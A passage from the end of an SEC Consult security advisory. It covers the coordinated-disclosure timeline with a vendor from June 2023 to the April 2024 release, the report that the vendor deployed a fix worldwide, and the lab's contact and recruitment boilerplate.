2023-06-07: Vendor response, provides PGP key, sending encrypted security advisory. 2023-06-08: Vendor response, team is investigating the report, asking about public disclosure timeline. 2023-06-16: Vendor is still working on the report, will inform us on a weekly basis. 2023-07-24: Vendor requires additional time, next update will be early September, provides weekly updates. 2023-09-14: Vendor team is working on rolling out a fix. 2023-09-21: Vendor encountered roll-out issues, full mass deployment now scheduled to be finished in 2023Q4. 2023-10-05: Vendor hit "first milestone" in their development, 3-staged approach. 2023-10-25: Vendor hit second milestone before full rollout. 2024-02-14: Asking for a status update. 2024-02-15: Vendor is still working on the issue. Asking them for a timeline. 2024-02-23: Vendor reports that fix is implemented and deployed worldwide. Coordinating public release. 2024-02-28: Sending details where we publish the advisory, asking for a CVE number. 2024-03-01: Vendor asks whether we meant CVE or CVSS. 2024-04-08: Clarifying that we mean CVE, but CVE not needed for cloud. Setting release date to 11th April. 2024-04-11: Coordinated release of security advisory. Solution: --------- The vendor has fixed the issue and deployed the patch worldwide as of as of 2024-02-23. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Michael Werner / @2024 </code></pre>